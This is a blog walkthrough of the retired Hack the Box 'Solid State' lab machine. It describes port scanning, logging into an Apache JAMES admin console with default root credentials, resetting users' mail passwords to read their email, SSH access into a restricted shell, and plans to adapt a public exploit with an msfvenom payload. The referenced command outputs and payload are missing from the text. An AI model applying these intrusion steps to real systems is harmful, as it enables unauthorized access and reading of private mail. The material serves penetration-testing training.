Hack the Box: Solid State Walkthrough

Welcome to another Hack the Box walkthrough. Today, we’ll be talking about the newly retired Solid State machine. This was one of the first ones that I was able to do on my own without hints while working on the OSCP, so it’s one that I hold near and dear to my heart. Anyway, enough blabbing, let’s get hacking.

Reconnaissance

First thing we need to do with any new host is scan it and learn more about what services are running on the machine. Let’s run a quick top 100 port scan with nmap. With this, we see:

Ok, so we see a few things that look interesting. Looks like some web ports, some email ports, and SSH. It always interests me when multiple services have a related name, those often seem to present a nice attack surface. Doing a quick google search, we see something that catches our attention:

Google search for Apache JAMES server exploits

Well that’s nice, the version matches what we found on the server. So lets dig into this more. Looking into the exploit, we see that it’s an authenticated command execution vulnerability. Worth being aware of in case we can leverage it anyway. By default, it seems to be connecting to the target on port 4555 with default credentials of root for both the username and password as seen below:

Interesting. So we can login, we have a few users on the server. This should mean our exploit at least can be sent. Whether we can get it to trigger though is still a different story. Easiest way though to see if any of the users has email of interest is to manually reset their passwords. Lets do that then login to their email to see what they have to say:

Wonderful. Now we have credentials. Lets see if they work on SSH. Maybe we don’t need an exploit!

root@kali:~/Pentest/10.51-solidstate/02-exploitation/02-success# ssh mindy@10.10.10.51
The authenticity of host '10.10.10.51 (10.10.10.51)' can't be established.
ECDSA key fingerprint is SHA256:njQxYC21MJdcSfcgKOpfTedDAXx50SYVGPCfChsGwI0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.51' (ECDSA) to the list of known hosts.
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
.
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 16 00:55:41 2018 from 10.10.14.15
mindy@solidstate:~$ echo $0
-rbash

OK, looks like we’re in rbash and will need to use the exploit. Lets give that a try.

Exploitation

OK, so we have credentials that work over SSH and an exploit. So let’s retrieve https://www.exploit-db.com/exploits/35513/ and fix it for our use.

That doesn’t help us. We may not be root for one, and if we are, we want a shell. Because of that, we want to change our payload. Lets use msfvenom to build a new one. The following command should work for us:

Lot of stuff here to review. But if we look closely a few things jump out at us. First, the root user can login over SSH. That has potential to be interesting for sure. The other thing that catches our attention is that there is a world writable file owned by root. Maybe we can use this.

Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.